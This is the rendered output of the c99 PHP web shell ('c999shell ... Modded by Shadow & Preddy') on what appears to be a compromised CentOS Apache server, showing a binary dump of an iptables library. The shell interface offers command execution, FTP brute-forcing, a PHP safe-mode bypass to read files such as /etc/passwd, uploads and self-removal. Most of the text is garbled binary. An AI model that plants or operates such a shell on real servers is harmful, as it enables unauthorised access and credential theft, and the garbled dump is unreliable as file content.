!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/lib/iptables/   drwxr-xr-x
Free 52.24 GB of 127.8 GB (40.87%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     libipt_tcp.so (8.53 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
ELF44 (**X`$$+$+Ptdxxx||Qtd PI|CE>=~qX % P g]Ae=sb=Z"W(- -9&
 -;T __gmon_start___fini__cxa_finalize_Jv_RegisterClassesmy_initregister_match__printf_chkputchargetservbyportstring_to_numbergetservbynameexit_error__strdupstrchrfreestrtokstrcasecmpoptindoptargcheck_inverselibc.so.6_edata__bss_start_endGLIBC_2.1.3GLIBC_2.0GLIBC_2.3.4si    ii ti    ****++++ +h,t,x,|,,,,,,,,,,,-*+++    ++,, ,,,,, ,
$, (, ,, 0,4,8,<,Uk hhhhh  h($h0(h8p,h@`0hHP4hP@8hX0<h` @hhDhpUS[,%tX[ÐUVS$,uWt($t)p(9v((9wƃ,[^]ÍUS.$tt $҃[]Ë$ÐUE f@f@]É'U]Ít&'US$H$[]Ív'US#$xD$D$[]Ð&UWVSIÚ#EEEUM1uE萍t&P t҉׋Eu3UD$E$D$ UEu[^_]$,뿍~D$$[^_]É'UWVS} v"f w uf~t?F W Ff9D$ ‰D$D$$Qf~uf~t?F VFf9'D$ ‰D$D$$~F t4D$$F$D$D$~    urF t]D$$D$$F    <t$ F
$ w[^_]Í&F tF t&T9t&D$$VFf9‰D$D$$&D$$W Ff9<‰D$D$$>&U]IÚ ҉uuIfT$$t*t$D$D$$+]u]Ít$D$$]u]Ðt&U(]
 }ϋMuօɍUt    Ufu
fD$D$$f9t[E$D$D$vU $:U $ h]u}]ÍvuD$$t$U 뺍UKt&뮍&'UWVSu $~ D$EOV D$G $EWOD$G $xG Ww    G O
u5G tD$D$$ [^_]ÄMT$D$$Eu`A$/E,$ qua‰D$ L$D$$x!E$D$ ‰D$D$LEt&뗐&U(]:uƍED$ D$D$4$PtE]u]Ðt&D$4$vt,@fEuōt$D$$Eݐt&U]IÚu}׉$4D$:$btlE1>u&fE8u-fG4$u]u}]ÉfE8tf9fGvˍ-D$$RfGf륍v'UWVS,$|EKED$E$1EEt|EEu1ED$$t(uE$D$MD$    EE$D$EuE$LE,[^_]É'U|$ljЉ4$G    G
EtO 4$|$]Ðt&U8E U]u}811Vç wAlU8Ecg$aM    ]u}]ËE!ED$D$ t$$vU D^EM    떋MED$D$ t$$U tED$ D$D$4$EGE$M    EED$D$ t$$UU <-<!UE DEEU$U
}EED$D$ t$$WM DEu&E ,D$$O ԀO XO D$$D$$nD$$Xwt$D$$>LD$$(UVS}p@t Ћu[^]ÐUS[ØY[1.3.5NONE! --sport %u:%u --sport %u --dport %u:%u --dport %u --tcp-option %u --tcp-flags tcp%u!tcp sptdptoption=%s%u flags:%s0x%02X/0x%02X Unknown invflags: 0x%X invalid portrange (min > max),Unknown TCP flag `%s'SYNSYN,RST,ACK,FINBad TCP option `%s'RSTPSHACKURGALLsource-portsportdestination-portdportsyntcp-flagstcp-optionTCP v%s options:
 --tcp-flags [!] mask comp    match when TCP flags & mask == comp
                (Flags: SYN ACK FIN RST URG PSH ALL NONE)
[!] --syn            match when only SYN flag set
                (equivalent to --tcp-flags SYN,RST,ACK SYN)
 --source-port [!] port[:port]
 --sport ...
                match source port(s)
 --destination-port [!] port[:port]
 --dport ...
                match destination port(s)
 --tcp-option [!] number       match if TCP option set

invalid TCP port/service `%s' specifiedOnly one `--source-port' allowedOnly one `--destination-port' allowedOnly one of `--syn' or `--tcp-flags'  allowed--tcp-flags requires two args.Only one `--tcp-option' allowed+r;x8Xh$Dhdx8x ,zR| AB 8AB T&AB Ap8AB AAB F|)AB FAB FP AB FNHAB C0AB FN PAB FQtAB Cd;AB GGAB Rk[ ?v +  To
$ +x(8oooo$+.>N^n~tcpp 0      ,1122345libipt_tcp.so.debugټ.shstrtab.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rel.dyn.rel.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.ctors.dtors.jcr.data.rel.ro.dynamic.got.got.plt.data.bss.gnu_debuglink o< $%o22o@A    88J    ((x    SNY _TTeppmxx|{* ***D $+$++H@,@  -  8

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0161 ]--